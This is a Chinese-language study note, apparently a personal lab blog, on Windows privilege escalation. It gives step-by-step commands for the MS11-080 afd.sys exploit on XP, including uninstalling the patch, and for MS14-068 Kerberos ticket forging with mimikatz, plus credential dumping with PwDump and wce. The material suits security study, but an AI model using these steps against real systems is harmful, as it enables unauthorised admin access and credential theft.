前言
之前的提权
基本是从admin提升到system
有点理想化
现在假设只是个普通账号
提升到admin
利用漏洞
1、winxp
ms11-080漏洞
对应补丁Kb2592799
https://technet.microsoft.com/library/security/ms11-080
下载漏洞脚本
root@kali:~# searchsploit Ms11-080
------------------------------------------ --------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------ --------------------------------
Microsoft Windows - 'AfdJoinLeaf' Local P | exploits/windows/local/21844.rb
Microsoft Windows XP/2003 - 'afd.sys' Loc | exploits/windows/local/18176.py
------------------------------------------ --------------------------------
root@kali:~# cp /usr/share/exploitdb/exploits/windows/local/18176.py . # 将文件拷贝到 英文版 WinXP 系统(中文版 XP 有可能变成Dos)
查看 WinXP 是否安装了 对应更新 Kb2592799
WinXP -> 运行 -> appwiz.cpl -> 查看是否有安装 Kb2592799,有的话卸载掉
如果目标机有python环境
现在就可以运行了
打包
如果没有python环境
我们需要把这个py打包成exe
root@kali:~# apt-get install python-pip # 使用 python2 的 pyinstaller 将 python 文件进行打包
root@kali:~# pip install pyinstaller
把pyinstaller.py拷贝到自己的有python环境的xp中
C:\>pyinstaller --onefile 18176.py #编译为exe
297 INFO: Building EXE from out00-EXE.toc
297 INFO: Appending archive to EXE C:\dist\18176.exe #这是输出路径
328 INFO: Building EXE from out00-EXE.toc completed successfully.
把18176.exe拷贝到目标英文xp的c盘temp里
C:\>cd 111
C:\111>18176.exe -O XP #执行
C:\WINDOWS\system32>whoami #现在权限是system
SYSTEM
C:\WINDOWS\system32>net localgroup administrators test /add # 将自己添加为管理员组
以后登录就是admin的权限
2、win7
这里我们用域控制器
在win2003中
运行 -> dcpromo
- 设置成域控制器,配置静态 IP 地址
- 设置强密码
- C:>net user Administrator jlcssadmin2006…
Win7
- 设置 静态 IP,并将 DNS 设置为 Win2003 的IP地址
- 加入域控制器
总之是配置完成域控制器
加入就是dns设为2003的ip
以及计算机名更改加入域
重启
Ms14-068漏洞下载
root@kali:~# searchsploit Ms14-068
------------------------------------------ ----------------------------------
Exploit Title | Path
| (/usr/share/ exploitdb/)
------------------------------------------ ----------------------------------
Microsoft Windows Kerberos - Privilege Es | exploits/windows/remote/35474.py
------------------------------------------ ---------------------------------
root@kali:~# cp /usr/share/exploitdb/exploits/windows/remote/35474.py .
域环境下使用通用工具查看本地密码
C:\fgdump>PwDump.exe localhost # 仅是本地密码
C:\>wce-universal.exe # 结果是域控制器密码
C:\>wce-universal.exe -w
Administrator\LAB:jlcssadmin
C:\Win32>mimikatz.exe
mimikatz # ::
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # kerberos::list
mimikatz # sekurlsa::logonPasswords
逻辑
在 kali 通过脚本生成一个票据文件
ms14-068.py -u [email protected] -s userSID -d dc.lab.com #-u 用户名:登录用户名,-s userSID,-d 域控制器
名称:在 Win7 计算机名称处查看,不在域控是,可以用IP地址代替
将票据文件[email protected]拷贝到 win 系统里
在 win 系统里使用 mimikatz.exe 完成权限的提升
mimikatz.exe log "kerberos::ptc [email protected]" exit
过程
在 Win7 上使用本地用户登录
# 查看域账号的信息
C:\>net user
\\WIN7-VM 的用户帐户
Administrator Guest John
user1 user2
C:\Win32>whoami.exe /all #查看userSID
[User] = "LAB\user3" S-1-5-21-3056505427-3800332898-2304591883-1111
kali下生成票据文件
root@kali:~# python 35474.py -u [email protected] -s S-1-5-21-3056505427-3800332898-2304591883-1111 -d 172.16.10.132
如果有模块报错,下载安装模块https://github.com/bidord/pykek
拷贝到Win7 下执行
C:\mimikatz\Win32>mimikatz.exe log "kerberos::ptc [email protected]" exit
# 如果inject成功 你有可能获得到了域管理session,那么klist看一下是否有了kerberos Ticket
C:\mimikatz\Win32>klist
当前登录 ID 是 0:0x776bd
缓存的票证: (1)
#0> 客户端: user3 @ LAB.COM
服务器: krbtgt/LAB.COM @ LAB.COM
Kerberos 票证加密类型: RSADSI RC4-HMAC(NT)
票证标志 0x50a00000 -> forwardable proxiable renewable pre_authent
开始时间: 3/4/2018 2:00:45 (本地)
结束时间: 3/4/2018 12:00:44 (本地)
续订时间: 3/11/2018 2:00:44 (本地)
会话密钥类型: RSADSI RC4-HMAC(NT)
C:\mimikatz\Win32>net use \\Win2003.lab.com\admin$
完成
结语
实话实说
这一节学的有点问题
上面写的问题不大
但有些地方还没搞太明白
回头再多试试
另外
一些漏洞和补丁
真的需要好好关注下
尤其是一些经典的要熟悉